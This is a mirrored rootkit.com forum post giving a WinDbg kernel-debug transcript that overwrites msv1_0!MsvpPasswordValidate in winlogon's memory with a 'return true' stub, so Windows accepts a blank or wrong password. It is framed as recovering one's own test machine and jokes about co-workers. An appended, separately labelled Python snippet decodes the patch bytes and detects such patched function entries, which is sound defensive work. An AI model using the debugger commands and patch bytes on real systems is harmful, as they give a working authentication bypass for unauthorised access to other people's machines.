from rootkit.com
-------------------------------
bugcheck writes: After living out of a duffle bag for 2 months now I've finally got all my stuff back and have settled into a new apartment and finally have dev PCs again, W00h00! So this isn't the first time I have had to do this to recover an install with a forgotten password, but figured I'd share it in case you are able to take advantage of it (thx to a friend for pointing out what function did the trick). As stupid as I am, I always pick those unique but easy to remember passwords that of course I'll never forget, use it once and shelve the image for months at a time and then of course, forget it. In my case today it's my dev box!!! Luckily I had been using it as a test machine when I first got it so I happened to already have a boot.ini entry to kernel debug on 1394 and of course had my laptop handy. I know there are better ways to recover a forgotten password but of course it's not as cool as this! =P It doesn't reset it but at least you can log in again...
Happy debugging,
Chris
kd> !process 0 0 winlogon.exe
PROCESS 817bb978 SessionId: 0 Cid: 0260 Peb: 7ffdc000 ParentCid: 0168
DirBase: 05e40060 ObjectTable: e148a858 HandleCount: 455.
Image: winlogon.exe
kd> .process /p /r 817bb978
Implicit process is now 817bb978
.cache forcedecodeuser done
Loading User Symbols
...................................................
kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 ?? ???
^ Memory access error in 'u msv1_0!MsvpPasswordValidate l3'
kd> .pagein msv1_0!MsvpPasswordValidate
You need to continue execution (press 'g' ) for the pagein to be brought in. When the debugger breaks in again, the page will be present.
kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
80526da8 cc int 3
kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 8bff mov edi,edi
77c79929 55 push ebp
77c7992a 8bec mov ebp,esp
kd> eq msv1_0!MsvpPasswordValidate cccc000cc201b0
kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 b001 mov al,0x1
77c79929 c20c00 ret 0xc
77c7992c cc int 3
kd> ** YOU CAN NOW LOGIN WITH A BLANK PASSWORD!
kd> ** DONT BE SCREWIN WITH YOUR CO-WORKERS NOW =p
kd> g
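An added example, not part of the original post or of any rootkit.com code: it decodes the `eq` operand from the transcript into the bytes the second disassembly shows, and flags a function entry point that has been overwritten with a constant-return stub. The function names are hypothetical, and using the transcript's prologue as the reference is an assumption; in practice the reference bytes would be read from the DLL file on disk.

```python
import struct

# Bytes shown by `u msv1_0!MsvpPasswordValidate l3` before the edit (from the transcript).
CLEAN_ENTRY = bytes.fromhex("8bff558bec")   # mov edi,edi / push ebp / mov ebp,esp
EQ_OPERAND = 0x00CCCC000CC201B0             # operand of the `eq` command in the transcript


def eq_bytes(value: int) -> bytes:
    """Bytes stored by the debugger's enter-quadword command: 8 bytes, little-endian."""
    return struct.pack("<Q", value)


def forced_return(entry: bytes):
    """Return (return_value, stack_bytes_popped) if the entry point is nothing but
    'load a constant into AL/EAX, then return'; otherwise None."""
    if entry[:1] == b"\xb0" and len(entry) >= 2:            # mov al, imm8
        value, rest = entry[1], entry[2:]
    elif entry[:1] == b"\xb8" and len(entry) >= 5:          # mov eax, imm32
        value, rest = struct.unpack_from("<I", entry, 1)[0], entry[5:]
    elif entry[:2] in (b"\x33\xc0", b"\x31\xc0"):           # xor eax, eax
        value, rest = 0, entry[2:]
    else:
        return None
    if rest[:1] == b"\xc3":                                 # ret
        return value, 0
    if rest[:1] == b"\xc2" and len(rest) >= 3:              # ret imm16
        return value, struct.unpack_from("<H", rest, 1)[0]
    return None


def check_entry(live: bytes, reference: bytes = CLEAN_ENTRY) -> str:
    """Compare bytes read from memory with the reference bytes for the same function."""
    if live[:len(reference)] == reference:
        return "clean"
    stub = forced_return(live)
    if stub:
        return f"PATCHED: always returns {stub[0]:#x}, pops {stub[1]} bytes"
    return "MODIFIED: entry differs from reference"


if __name__ == "__main__":
    patched = eq_bytes(EQ_OPERAND)
    print(patched.hex(" "))                            # byte order as laid out in memory
    print(check_entry(CLEAN_ENTRY + b"\x00\x00\x00"))  # constructed padding after the prologue
    print(check_entry(patched))
```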
This is a mirrored post. Source: 北邮人论坛 / security / #6644. Synced on 2006/12/26.
Bypassing your testbox's login password
flyingkisser